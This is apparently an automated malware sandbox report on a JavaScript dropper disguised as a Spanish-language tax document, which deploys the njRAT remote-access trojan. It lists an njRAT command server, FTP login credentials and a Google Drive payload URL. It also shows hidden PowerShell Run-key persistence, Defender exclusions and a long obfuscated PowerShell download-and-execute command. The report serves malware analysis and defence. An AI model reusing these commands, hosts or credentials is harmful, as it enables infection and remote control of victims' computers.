Analysis
-
max time kernel
146s -
max time network
149s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
06-12-2024 15:59
Static task
static1
Behavioral task
behavioral1
Sample
06122024_1551_04122024_Historial-Declcaraciones-vencidas-2022-2023.js
Resource
win7-20241023-en
Behavioral task
behavioral2
Sample
06122024_1551_04122024_Historial-Declcaraciones-vencidas-2022-2023.js
Resource
win10v2004-20241007-en
General
-
Target
06122024_1551_04122024_Historial-Declcaraciones-vencidas-2022-2023.js
-
Size
195KB
-
MD5
6675b77a4e527883e0cd36a107269299
-
SHA1
48b54aab7672ff52328632c110c7b14207f91832
-
SHA256
cb8afa9d1cab7e87066a992f5954e223720e39064d6d9f425a5e85a13e6a9b3a
-
SHA512
b4182d413aa3b8133c72a61a3b2136f6a61a4ce0a6f054d40329a00c897140003046ec34fce3dea5de6c88a491b3a920744cb48fb69b6c4f0c70f5bbc6f79046
-
SSDEEP
3072:lW1tKbWXt+NWXt+NWXt+NWXt+NWXt+NWXt+CWXt+NWXt+NWXt+NWXt+NWXt+NWXC:G
Malware Config
Extracted
https://drive.google.com/uc?export=download&id=
Extracted
Protocol: ftp- Host:
ftp.desckvbrat.com.br - Port:
21 - Username:
desckvbrat1 - Password:
fYudY1578@@@@@@
Extracted
njrat
0.7NC
NYAN CAT
hugolganador.duckdns.org:5250
f07d2cf4921a47eb98
-
reg_key
f07d2cf4921a47eb98
-
splitter
@!#&^%$
Signatures
-
Njrat family
-
Blocklisted process makes network request 9 IoCs
flow pid Process 8 4836 powershell.exe 16 4836 powershell.exe 18 4836 powershell.exe 20 1868 powershell.exe 23 1868 powershell.exe 24 1868 powershell.exe 27 1868 powershell.exe 28 1868 powershell.exe 31 4704 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 20 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 4848 powershell.exe 4852 powershell.exe 4956 powershell.exe 2556 powershell.exe 3456 powershell.exe 4180 powershell.exe 1868 powershell.exe 5024 powershell.exe 3532 powershell.exe 1560 powershell.exe 1160 powershell.exe 2536 powershell.exe 4468 powershell.exe 4704 powershell.exe 2888 powershell.exe 2964 powershell.exe 2968 powershell.exe 3344 powershell.exe 4836 powershell.exe 3888 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation wscript.exe -
Adds Run key to start application 2 TTPs 10 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Update Drivers NVIDEO_hvx = "cmd.exe /c start /min \"\" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command \". 'C:\\Users\\Admin\\AppData\\LocalLow\\Daft Sytem\\Program Rules NVIDEO\\Program Rules NVIDEO\\Program Rules NVIDEO\\Program Rules NVIDEO\\vmumy.ps1' \";exit" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Update Drivers NVIDEO_tjj = "cmd.exe /c start /min \"\" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command \". 'C:\\Users\\Admin\\AppData\\LocalLow\\Daft Sytem\\Program Rules NVIDEO\\Program Rules NVIDEO\\Program Rules NVIDEO\\Program Rules NVIDEO\\vmumy.ps1' \";exit" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Update Drivers NVIDEO_tjj = "cmd.exe /c start /min \"\" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command \". 'C:\\Users\\Admin\\AppData\\LocalLow\\Daft Sytem\\Program Rules NVIDEO\\Program Rules NVIDEO\\Program Rules NVIDEO\\Program Rules NVIDEO\\vmumy.ps1' \";exit" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Update Drivers NVIDEO_tjj = "cmd.exe /c start /min \"\" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command \". 'C:\\Users\\Admin\\AppData\\LocalLow\\Daft Sytem\\Program Rules NVIDEO\\Program Rules NVIDEO\\Program Rules NVIDEO\\Program Rules NVIDEO\\vmumy.ps1' \";exit" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Update Drivers NVIDEO_tjj = "cmd.exe /c start /min \"\" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command \". 'C:\\Users\\Admin\\AppData\\LocalLow\\Daft Sytem\\Program Rules NVIDEO\\Program Rules NVIDEO\\Program Rules NVIDEO\\Program Rules NVIDEO\\vmumy.ps1' \";exit" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Update Drivers NVIDEO_tjj = "cmd.exe /c start /min \"\" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command \". 'C:\\Users\\Admin\\AppData\\LocalLow\\Daft Sytem\\Program Rules NVIDEO\\Program Rules NVIDEO\\Program Rules NVIDEO\\Program Rules NVIDEO\\vmumy.ps1' \";exit" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Update Drivers NVIDEO_tjj = "cmd.exe /c start /min \"\" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command \". 'C:\\Users\\Admin\\AppData\\LocalLow\\Daft Sytem\\Program Rules NVIDEO\\Program Rules NVIDEO\\Program Rules NVIDEO\\Program Rules NVIDEO\\vmumy.ps1' \";exit" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Update Drivers NVIDEO_tjj = "cmd.exe /c start /min \"\" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command \". 'C:\\Users\\Admin\\AppData\\LocalLow\\Daft Sytem\\Program Rules NVIDEO\\Program Rules NVIDEO\\Program Rules NVIDEO\\Program Rules NVIDEO\\vmumy.ps1' \";exit" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Update Drivers NVIDEO_tjj = "cmd.exe /c start /min \"\" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command \". 'C:\\Users\\Admin\\AppData\\LocalLow\\Daft Sytem\\Program Rules NVIDEO\\Program Rules NVIDEO\\Program Rules NVIDEO\\Program Rules NVIDEO\\vmumy.ps1' \";exit" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Update Drivers NVIDEO_tjj = "cmd.exe /c start /min \"\" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command \". 'C:\\Users\\Admin\\AppData\\LocalLow\\Daft Sytem\\Program Rules NVIDEO\\Program Rules NVIDEO\\Program Rules NVIDEO\\Program Rules NVIDEO\\vmumy.ps1' \";exit" powershell.exe -
Hide Artifacts: Hidden Window 1 TTPs 2 IoCs
Windows that would typically be displayed when an application carries out an operation can be hidden.
pid Process 4516 cmd.exe 4380 cmd.exe -
Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 30 pastebin.com 31 pastebin.com -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 4704 set thread context of 3712 4704 powershell.exe 102 -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language InstallUtil.exe -
Suspicious behavior: EnumeratesProcesses 42 IoCs
pid Process 3888 powershell.exe 3888 powershell.exe 4836 powershell.exe 4836 powershell.exe 4836 powershell.exe 1868 powershell.exe 1868 powershell.exe 4848 powershell.exe 4852 powershell.exe 4852 powershell.exe 4848 powershell.exe 1868 powershell.exe 4956 powershell.exe 2556 powershell.exe 4956 powershell.exe 2556 powershell.exe 3456 powershell.exe 3456 powershell.exe 4180 powershell.exe 4180 powershell.exe 4704 powershell.exe 4704 powershell.exe 5024 powershell.exe 5024 powershell.exe 2888 powershell.exe 2888 powershell.exe 2964 powershell.exe 2964 powershell.exe 3532 powershell.exe 3532 powershell.exe 2968 powershell.exe 2968 powershell.exe 1560 powershell.exe 1560 powershell.exe 1160 powershell.exe 1160 powershell.exe 2536 powershell.exe 2536 powershell.exe 3344 powershell.exe 3344 powershell.exe 4468 powershell.exe 4468 powershell.exe -
Suspicious use of AdjustPrivilegeToken 53 IoCs
description pid Process Token: SeDebugPrivilege 3888 powershell.exe Token: SeDebugPrivilege 4836 powershell.exe Token: SeDebugPrivilege 1868 powershell.exe Token: SeDebugPrivilege 4848 powershell.exe Token: SeDebugPrivilege 4852 powershell.exe Token: SeDebugPrivilege 4956 powershell.exe Token: SeDebugPrivilege 2556 powershell.exe Token: SeDebugPrivilege 3456 powershell.exe Token: SeDebugPrivilege 4180 powershell.exe Token: SeDebugPrivilege 4704 powershell.exe Token: SeDebugPrivilege 5024 powershell.exe Token: SeDebugPrivilege 2888 powershell.exe Token: SeDebugPrivilege 3712 InstallUtil.exe Token: 33 3712 InstallUtil.exe Token: SeIncBasePriorityPrivilege 3712 InstallUtil.exe Token: 33 3712 InstallUtil.exe Token: SeIncBasePriorityPrivilege 3712 InstallUtil.exe Token: SeDebugPrivilege 2964 powershell.exe Token: 33 3712 InstallUtil.exe Token: SeIncBasePriorityPrivilege 3712 InstallUtil.exe Token: 33 3712 InstallUtil.exe Token: SeIncBasePriorityPrivilege 3712 InstallUtil.exe Token: SeDebugPrivilege 3532 powershell.exe Token: 33 3712 InstallUtil.exe Token: SeIncBasePriorityPrivilege 3712 InstallUtil.exe Token: SeDebugPrivilege 2968 powershell.exe Token: 33 3712 InstallUtil.exe Token: SeIncBasePriorityPrivilege 3712 InstallUtil.exe Token: 33 3712 InstallUtil.exe Token: SeIncBasePriorityPrivilege 3712 InstallUtil.exe Token: SeDebugPrivilege 1560 powershell.exe Token: 33 3712 InstallUtil.exe Token: SeIncBasePriorityPrivilege 3712 InstallUtil.exe Token: 33 3712 InstallUtil.exe Token: SeIncBasePriorityPrivilege 3712 InstallUtil.exe Token: SeDebugPrivilege 1160 powershell.exe Token: 33 3712 InstallUtil.exe Token: SeIncBasePriorityPrivilege 3712 InstallUtil.exe Token: 33 3712 InstallUtil.exe Token: SeIncBasePriorityPrivilege 3712 InstallUtil.exe Token: SeDebugPrivilege 2536 powershell.exe Token: 33 3712 InstallUtil.exe Token: SeIncBasePriorityPrivilege 3712 InstallUtil.exe Token: 33 3712 InstallUtil.exe Token: SeIncBasePriorityPrivilege 3712 InstallUtil.exe Token: SeDebugPrivilege 3344 powershell.exe Token: 33 3712 InstallUtil.exe Token: SeIncBasePriorityPrivilege 3712 InstallUtil.exe Token: 33 3712 InstallUtil.exe Token: SeIncBasePriorityPrivilege 3712 InstallUtil.exe Token: SeDebugPrivilege 4468 powershell.exe Token: 33 3712 InstallUtil.exe Token: SeIncBasePriorityPrivilege 3712 InstallUtil.exe -
Suspicious use of WriteProcessMemory 56 IoCs
description pid Process procid_target PID 3172 wrote to memory of 3888 3172 wscript.exe 82 PID 3172 wrote to memory of 3888 3172 wscript.exe 82 PID 3888 wrote to memory of 4836 3888 powershell.exe 84 PID 3888 wrote to memory of 4836 3888 powershell.exe 84 PID 4836 wrote to memory of 1868 4836 powershell.exe 85 PID 4836 wrote to memory of 1868 4836 powershell.exe 85 PID 1868 wrote to memory of 4848 1868 powershell.exe 86 PID 1868 wrote to memory of 4848 1868 powershell.exe 86 PID 1868 wrote to memory of 4852 1868 powershell.exe 87 PID 1868 wrote to memory of 4852 1868 powershell.exe 87 PID 1868 wrote to memory of 5096 1868 powershell.exe 88 PID 1868 wrote to memory of 5096 1868 powershell.exe 88 PID 1868 wrote to memory of 4516 1868 powershell.exe 89 PID 1868 wrote to memory of 4516 1868 powershell.exe 89 PID 4516 wrote to memory of 4956 4516 cmd.exe 90 PID 4516 wrote to memory of 4956 4516 cmd.exe 90 PID 1868 wrote to memory of 4380 1868 powershell.exe 91 PID 1868 wrote to memory of 4380 1868 powershell.exe 91 PID 4380 wrote to memory of 2556 4380 cmd.exe 92 PID 4380 wrote to memory of 2556 4380 cmd.exe 92 PID 4956 wrote to memory of 3456 4956 powershell.exe 93 PID 4956 wrote to memory of 3456 4956 powershell.exe 93 PID 2556 wrote to memory of 4180 2556 powershell.exe 94 PID 2556 wrote to memory of 4180 2556 powershell.exe 94 PID 1868 wrote to memory of 4704 1868 powershell.exe 99 PID 1868 wrote to memory of 4704 1868 powershell.exe 99 PID 1868 wrote to memory of 420 1868 powershell.exe 100 PID 1868 wrote to memory of 420 1868 powershell.exe 100 PID 4704 wrote to memory of 5024 4704 powershell.exe 101 PID 4704 wrote to memory of 5024 4704 powershell.exe 101 PID 4704 wrote to memory of 3712 4704 powershell.exe 102 PID 4704 wrote to memory of 3712 4704 powershell.exe 102 PID 4704 wrote to memory of 3712 4704 powershell.exe 102 PID 4704 wrote to memory of 3712 4704 powershell.exe 102 PID 4704 wrote to memory of 3712 4704 powershell.exe 102 PID 4704 wrote to memory of 3712 4704 powershell.exe 102 PID 4704 wrote to memory of 3712 4704 powershell.exe 102 PID 4704 wrote to memory of 3712 4704 powershell.exe 102 PID 5024 wrote to memory of 2888 5024 powershell.exe 106 PID 5024 wrote to memory of 2888 5024 powershell.exe 106 PID 5024 wrote to memory of 2964 5024 powershell.exe 109 PID 5024 wrote to memory of 2964 5024 powershell.exe 109 PID 5024 wrote to memory of 3532 5024 powershell.exe 110 PID 5024 wrote to memory of 3532 5024 powershell.exe 110 PID 5024 wrote to memory of 2968 5024 powershell.exe 111 PID 5024 wrote to memory of 2968 5024 powershell.exe 111 PID 5024 wrote to memory of 1560 5024 powershell.exe 112 PID 5024 wrote to memory of 1560 5024 powershell.exe 112 PID 5024 wrote to memory of 1160 5024 powershell.exe 113 PID 5024 wrote to memory of 1160 5024 powershell.exe 113 PID 5024 wrote to memory of 2536 5024 powershell.exe 114 PID 5024 wrote to memory of 2536 5024 powershell.exe 114 PID 5024 wrote to memory of 3344 5024 powershell.exe 115 PID 5024 wrote to memory of 3344 5024 powershell.exe 115 PID 5024 wrote to memory of 4468 5024 powershell.exe 116 PID 5024 wrote to memory of 4468 5024 powershell.exe 116
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\06122024_1551_04122024_Historial-Declcaraciones-vencidas-2022-2023.js1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3172 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $nKvfY = 'JA' + [char]66 + 'jAEkATw' + [char]66 + 'lAEMAIAA9ACAAJA' + [char]66 + 'oAG8Acw' + [char]66 + '0AC4AVg' + [char]66 + 'lAHIAcw' + [char]66 + 'pAG8AbgAuAE0AYQ' + [char]66 + 'qAG8AcgAuAEUAcQ' + [char]66 + '1AGEAbA' + [char]66 + 'zACgAMgApADsASQ' + [char]66 + 'mACAAKAAgACQAYw' + [char]66 + 'JAE8AZQ' + [char]66 + 'DACAAKQAgAHsAJA' + [char]66 + 'IAHoATw' + [char]66 + 'NAGoAIAA9ACAAWw' + [char]66 + 'TAHkAcw' + [char]66 + '0AGUAbQAuAEkATwAuAFAAYQ' + [char]66 + '0AGgAXQA6ADoARw' + [char]66 + 'lAHQAVA' + [char]66 + 'lAG0AcA' + [char]66 + 'QAGEAdA' + [char]66 + 'oACgAKQA7AGQAZQ' + [char]66 + 'sACAAKAAkAEgAeg' + [char]66 + 'PAE0AagAgACsAIAAnAFwAVQ' + [char]66 + 'wAHcAaQ' + [char]66 + 'uAC4AbQ' + [char]66 + 'zAHUAJwApADsAJA' + [char]66 + 'xAHYAag' + [char]66 + 'qAGYAIAA9ACAAJw' + [char]66 + 'oAHQAdA' + [char]66 + 'wAHMAOgAvAC8AZA' + [char]66 + 'yAGkAdg' + [char]66 + 'lAC4AZw' + [char]66 + 'vAG8AZw' + [char]66 + 'sAGUALg' + [char]66 + 'jAG8AbQAvAHUAYwA/AGUAeA' + [char]66 + 'wAG8Acg' + [char]66 + '0AD0AZA' + [char]66 + 'vAHcAbg' + [char]66 + 'sAG8AYQ' + [char]66 + 'kACYAaQ' + [char]66 + 'kAD0AJwA7ACQAWA' + [char]66 + '1AG0AZg' + [char]66 + 'pACAAPQAgACQAZQ' + [char]66 + 'uAHYAOg' + [char]66 + 'QAFIATw' + [char]66 + 'DAEUAUw' + [char]66 + 'TAE8AUg' + [char]66 + 'fAEEAUg' + [char]66 + 'DAEgASQ' + [char]66 + 'UAEUAQw' + [char]66 + 'UAFUAUg' + [char]66 + 'FAC4AQw' + [char]66 + 'vAG4AdA' + [char]66 + 'hAGkAbg' + [char]66 + 'zACgAJwA2ADQAJwApADsAaQ' + [char]66 + 'mACAAKAAgACQAWA' + [char]66 + '1AG0AZg' + [char]66 + 'pACAAKQAgAHsAJA' + [char]66 + 'xAHYAag' + [char]66 + 'qAGYAIAA9ACAAKAAkAHEAdg' + [char]66 + 'qAGoAZgAgACsAIAAnADEAcAAyAGIAcg' + [char]66 + 'qAEgALQ' + [char]66 + 'RAE4AWQA1AGIAcg' + [char]66 + '3AGkATA' + [char]66 + 'aAHUAWQ' + [char]66 + 'zAFcALQ' + [char]66 + 'SADUAOQ' + [char]66 + 'VAHcAag' + [char]66 + 'kAFMARQ' + [char]66 + 'WACcAKQAgADsAfQ' + [char]66 + 'lAGwAcw' + [char]66 + 'lACAAewAkAHEAdg' + [char]66 + 'qAGoAZgAgAD0AIAAoACQAcQ' + [char]66 + '2AGoAag' + [char]66 + 'mACAAKwAgACcAMQ' + [char]66 + 'hAGEASA' + [char]66 + '5ADQALQ' + [char]66 + 'CAEwAMQ' + [char]66 + 'qAHAAQQ' + [char]66 + 'uAGoAaA' + [char]66 + '0AGUAZwA4ADgASw' + [char]66 + 'NAFoANw' + [char]66 + 'jAHUAOAAxAFoAMAA1AHcAJwApACAAOw' + [char]66 + '9ADsAJA' + [char]66 + '4AHgAdw' + [char]66 + '0AGwAIAA9ACAAKAAgAE4AZQ' + [char]66 + '3AC0ATw' + [char]66 + 'iAGoAZQ' + [char]66 + 'jAHQAIA' + [char]66 + 'OAGUAdAAuAFcAZQ' + [char]66 + 'iAEMAbA' + [char]66 + 'pAGUAbg' + [char]66 + '0ACAAKQAgADsAJA' + [char]66 + '4AHgAdw' + [char]66 + '0AGwALg' + [char]66 + 'FAG4AYw' + [char]66 + 'vAGQAaQ' + [char]66 + 'uAGcAIAA9ACAAWw' + [char]66 + 'TAHkAcw' + [char]66 + '0AGUAbQAuAFQAZQ' + [char]66 + '4AHQALg' + [char]66 + 'FAG4AYw' + [char]66 + 'vAGQAaQ' + [char]66 + 'uAGcAXQA6ADoAVQ' + [char]66 + 'UAEYAOAAgADsAJA' + [char]66 + '4AHgAdw' + [char]66 + '0AGwALg' + [char]66 + 'EAG8Adw' + [char]66 + 'uAGwAbw' + [char]66 + 'hAGQARg' + [char]66 + 'pAGwAZQAoACQAcQ' + [char]66 + '2AGoAag' + [char]66 + 'mACwAIAAoACQASA' + [char]66 + '6AE8ATQ' + [char]66 + 'qACAAKwAgACcAXA' + [char]66 + 'VAHAAdw' + [char]66 + 'pAG4ALg' + [char]66 + 'tAHMAdQAnACkAIAApACAAOwAkAFUAdw' + [char]66 + 'mAHcAWgAgAD0AIAAoACAAJw' + [char]66 + 'DADoAXA' + [char]66 + 'VAHMAZQ' + [char]66 + 'yAHMAXAAnACAAKwAgAFsARQ' + [char]66 + 'uAHYAaQ' + [char]66 + 'yAG8Abg' + [char]66 + 'tAGUAbg' + [char]66 + '0AF0AOgA6AFUAcw' + [char]66 + 'lAHIATg' + [char]66 + 'hAG0AZQAgACkAOw' + [char]66 + 'KAEMAQw' + [char]66 + 'HAFgAIAA9ACAAKAAgACQASA' + [char]66 + '6AE8ATQ' + [char]66 + 'qACAAKwAgACcAXA' + [char]66 + 'VAHAAdw' + [char]66 + 'pAG4ALg' + [char]66 + 'tAHMAdQAnACAAKQAgADsAIA' + [char]66 + 'wAG8Adw' + [char]66 + 'lAHIAcw' + [char]66 + 'oAGUAbA' + [char]66 + 'sAC4AZQ' + [char]66 + '4AGUAIA' + [char]66 + '3AHUAcw' + [char]66 + 'hAC4AZQ' + [char]66 + '4AGUAIA' + [char]66 + 'KAEMAQw' + [char]66 + 'HAFgAIAAvAHEAdQ' + [char]66 + 'pAGUAdAAgAC8Abg' + [char]66 + 'vAHIAZQ' + [char]66 + 'zAHQAYQ' + [char]66 + 'yAHQAIAA7ACAAQw' + [char]66 + 'vAHAAeQAtAEkAdA' + [char]66 + 'lAG0AIAAnACUARA' + [char]66 + 'DAFAASg' + [char]66 + 'VACUAJwAgAC0ARA' + [char]66 + 'lAHMAdA' + [char]66 + 'pAG4AYQ' + [char]66 + '0AGkAbw' + [char]66 + 'uACAAKAAgACQAVQ' + [char]66 + '3AGYAdw' + [char]66 + 'aACAAKwAgACcAXA' + [char]66 + '' + [char]66 + 'AHAAcA' + [char]66 + 'EAGEAdA' + [char]66 + 'hAFwAUg' + [char]66 + 'vAGEAbQ' + [char]66 + 'pAG4AZw' + [char]66 + 'cAE0AaQ' + [char]66 + 'jAHIAbw' + [char]66 + 'zAG8AZg' + [char]66 + '0AFwAVw' + [char]66 + 'pAG4AZA' + [char]66 + 'vAHcAcw' + [char]66 + 'cAFMAdA' + [char]66 + 'hAHIAdAAgAE0AZQ' + [char]66 + 'uAHUAXA' + [char]66 + 'QAHIAbw' + [char]66 + 'nAHIAYQ' + [char]66 + 'tAHMAXA' + [char]66 + 'TAHQAYQ' + [char]66 + 'yAHQAdQ' + [char]66 + 'wACcAIAApACAALQ' + [char]66 + 'mAG8Acg' + [char]66 + 'jAGUAIAA7AHAAbw' + [char]66 + '3AGUAcg' + [char]66 + 'zAGgAZQ' + [char]66 + 'sAGwALg' + [char]66 + 'lAHgAZQAgAC0AYw' + [char]66 + 'vAG0AbQ' + [char]66 + 'hAG4AZAAgACcAcw' + [char]66 + 'sAGUAZQ' + [char]66 + 'wACAAMQA4ADAAJwA7ACAAcw' + [char]66 + 'oAHUAdA' + [char]66 + 'kAG8Adw' + [char]66 + 'uAC4AZQ' + [char]66 + '4AGUAIAAvAHIAIAAvAHQAIAAwACAALw' + [char]66 + 'mACAAfQ' + [char]66 + 'lAGwAcw' + [char]66 + 'lACAAew' + [char]66 + 'bAFMAeQ' + [char]66 + 'zAHQAZQ' + [char]66 + 'tAC4ATg' + [char]66 + 'lAHQALg' + [char]66 + 'TAGUAcg' + [char]66 + '2AGkAYw' + [char]66 + 'lAFAAbw' + [char]66 + 'pAG4AdA' + [char]66 + 'NAGEAbg' + [char]66 + 'hAGcAZQ' + [char]66 + 'yAF0AOgA6AFMAZQ' + [char]66 + 'yAHYAZQ' + [char]66 + 'yAEMAZQ' + [char]66 + 'yAHQAaQ' + [char]66 + 'mAGkAYw' + [char]66 + 'hAHQAZQ' + [char]66 + 'WAGEAbA' + [char]66 + 'pAGQAYQ' + [char]66 + '0AGkAbw' + [char]66 + 'uAEMAYQ' + [char]66 + 'sAGwAYg' + [char]66 + 'hAGMAawAgAD0AIA' + [char]66 + '7ACQAdA' + [char]66 + 'yAHUAZQ' + [char]66 + '9ACAAOw' + [char]66 + 'bAFMAeQ' + [char]66 + 'zAHQAZQ' + [char]66 + 'tAC4ATg' + [char]66 + 'lAHQALg' + [char]66 + 'TAGUAcg' + [char]66 + '2AGkAYw' + [char]66 + 'lAFAAbw' + [char]66 + 'pAG4AdA' + [char]66 + 'NAGEAbg' + [char]66 + 'hAGcAZQ' + [char]66 + 'yAF0AOgA6AFMAZQ' + [char]66 + 'jAHUAcg' + [char]66 + 'pAHQAeQ' + [char]66 + 'QAHIAbw' + [char]66 + '0AG8AYw' + [char]66 + 'vAGwAIAA9ACAAWw' + [char]66 + 'TAHkAcw' + [char]66 + '0AGUAbQAuAE4AZQ' + [char]66 + '0AC4AUw' + [char]66 + 'lAGMAdQ' + [char]66 + 'yAGkAdA' + [char]66 + '5AFAAcg' + [char]66 + 'vAHQAbw' + [char]66 + 'jAG8AbA' + [char]66 + 'UAHkAcA' + [char]66 + 'lAF0AOgA6AFQAbA' + [char]66 + 'zADEAMgAgADsAaQ' + [char]66 + 'mACgAKA' + [char]66 + 'nAGUAdAAtAHAAcg' + [char]66 + 'vAGMAZQ' + [char]66 + 'zAHMAIAAnAFcAaQ' + [char]66 + 'yAGUAcw' + [char]66 + 'oAGEAcg' + [char]66 + 'rACcALAAnAGEAcA' + [char]66 + 'hAHQAZQ' + [char]66 + 'EAE4AUwAnACwAJw' + [char]66 + 'hAG4AYQ' + [char]66 + 'sAHkAeg' + [char]66 + 'lACcAIAAtAGUAYQAgAFMAaQ' + [char]66 + 'sAGUAbg' + [char]66 + '0AGwAeQ' + [char]66 + 'DAG8Abg' + [char]66 + '0AGkAbg' + [char]66 + '1AGUAKQAgAC0AZQ' + [char]66 + 'xACAAJA' + [char]66 + 'OAHUAbA' + [char]66 + 'sACkAewAgAA0ACgAgACAAIAAgACAAIAAgAA0ACg' + [char]66 + '9AA0ACgANAAoAZQ' + [char]66 + 'sAHMAZQ' + [char]66 + '7ACAADQAKAFIAZQ' + [char]66 + 'zAHQAYQ' + [char]66 + 'yAHQALQ' + [char]66 + 'DAG8AbQ' + [char]66 + 'wAHUAdA' + [char]66 + 'lAHIAIAAtAGYAbw' + [char]66 + 'yAGMAZQAgADsADQAKACAAIAAgACAAIAAgAGUAeA' + [char]66 + 'pAHQAIAA7AA0ACgAgAH0AIAA7ACQAcQ' + [char]66 + 'iAHMAcQ' + [char]66 + 'zACAAPQAgACgAJw' + [char]66 + 'mAHQAcAA6AC8ALw' + [char]66 + 'kAGUAcw' + [char]66 + 'jAGsAdg' + [char]66 + 'iAHIAYQ' + [char]66 + '0ADEAQA' + [char]66 + 'mAHQAcAAuAGQAZQ' + [char]66 + 'zAGMAaw' + [char]66 + '2AGIAcg' + [char]66 + 'hAHQALg' + [char]66 + 'jAG8AbQAuAGIAcgAvAFUAcA' + [char]66 + 'jAHIAeQ' + [char]66 + 'wAHQAZQ' + [char]66 + 'yACcAIAArACAAJwAvADAAMgAvAEQATA' + [char]66 + 'MADAAMQAuAHQAeA' + [char]66 + '0ACcAIAApADsAJA' + [char]66 + 'KAHUAaw' + [char]66 + 'wAFYAIAA9ACAAKAAgAFsAUw' + [char]66 + '5AHMAdA' + [char]66 + 'lAG0ALg' + [char]66 + 'JAE8ALg' + [char]66 + 'QAGEAdA' + [char]66 + 'oAF0AOgA6AEcAZQ' + [char]66 + '0AFQAZQ' + [char]66 + 'tAHAAUA' + [char]66 + 'hAHQAaAAoACkAIAArACAAJw' + [char]66 + 'kAGwAbAAwADEALg' + [char]66 + '0AHgAdAAnACkAOwAkAEwAUQ' + [char]66 + 'RAEEAQgAgAD0AIAAoAC0Aag' + [char]66 + 'vAGkAbgAgAFsAYw' + [char]66 + 'oAGEAcg' + [char]66 + 'bAF0AXQAoADEAMAAwACwAMQAwADEALAAxADEANQAsADkAOQAsADEAMAA3ACwAMQAxADgALAA5ADgALAAxADEANAAsADkANwAsADEAMQA2ACwANAA5ACkAKQAgADsAJA' + [char]66 + 'sAGwAbA' + [char]66 + 'HAHEAIAA9ACAAKAAtAGoAbw' + [char]66 + 'pAG4AIA' + [char]66 + 'bAGMAaA' + [char]66 + 'hAHIAWw' + [char]66 + 'dAF0AKAAxADAAMgAsACAAOAA5ACwAIAAxADEANwAsACAAMQAwADAALAAgADgAOQAsACAANAA5ACwAIAA1ADMALAAgADUANQAsACAANQA2ACwAIAA2ADQALAAgADYANAAsACAANgA0ACwAIAA2ADQALAAgADYANAAsACAANgA0ACAAKQApACAAOwAkAHcAZQ' + [char]66 + 'iAEMAbA' + [char]66 + 'pAGUAbg' + [char]66 + '0ACAAPQAgAE4AZQ' + [char]66 + '3AC0ATw' + [char]66 + 'iAGoAZQ' + [char]66 + 'jAHQAIA' + [char]66 + 'TAHkAcw' + [char]66 + '0AGUAbQAuAE4AZQ' + [char]66 + '0AC4AVw' + [char]66 + 'lAGIAQw' + [char]66 + 'sAGkAZQ' + [char]66 + 'uAHQAIAA7ACQAdw' + [char]66 + 'lAGIAQw' + [char]66 + 'sAGkAZQ' + [char]66 + 'uAHQALg' + [char]66 + 'DAHIAZQ' + [char]66 + 'kAGUAbg' + [char]66 + '0AGkAYQ' + [char]66 + 'sAHMAIAA9ACAAbg' + [char]66 + 'lAHcALQ' + [char]66 + 'vAGIAag' + [char]66 + 'lAGMAdAAgAFMAeQ' + [char]66 + 'zAHQAZQ' + [char]66 + 